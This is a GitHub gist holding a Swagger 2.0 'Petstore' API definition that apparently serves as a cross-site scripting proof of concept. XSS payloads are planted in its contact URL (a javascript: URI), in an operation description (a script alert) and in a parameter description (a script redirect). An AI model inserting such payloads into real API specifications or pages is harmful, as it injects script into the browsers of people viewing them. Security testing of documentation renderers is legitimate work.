-
-
Save danielAlbuquerque/161d7d5e6800b725dfd937a2f3147e46 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "version": "1.0.0", | |
| "title": "Swagger Petstore", | |
| "contact":{ | |
| "name": "API Support", | |
| "url": "javascript:alert('xss')" | |
| } | |
| }, | |
| "paths": { | |
| "/pets": { | |
| "get": { | |
| "description": "<script>alert('This is DNLALB executing random code on your machine....')</script>", | |
| "operationId": "findPets", | |
| "produces": [ | |
| "application/json", | |
| "application/xml", | |
| "text/xml", | |
| "text/html" | |
| ], | |
| "parameters": [ | |
| { | |
| "name": "tags", | |
| "in": "query", | |
| "description": "<script>window.location = 'https://www.cloudbric.com/wp-content/uploads/2017/01/XSS_3.png'</script>", | |
| "required": false, | |
| "type": "array", | |
| "items": { | |
| "type": "string" | |
| }, | |
| "collectionFormat": "csv" | |
| }, | |
| { | |
| "name": "limit", | |
| "in": "query", | |
| "description": "maximum number of results to return", | |
| "required": false, | |
| "type": "integer", | |
| "format": "int32" | |
| } | |
| ], | |
| "responses": { | |
| "200": { | |
| "description": "pet response", | |
| "schema": { | |
| "type": "string" | |
| } | |
| }, | |
| "default": { | |
| "description": "unexpected error" | |
| } | |
| } | |
| } | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment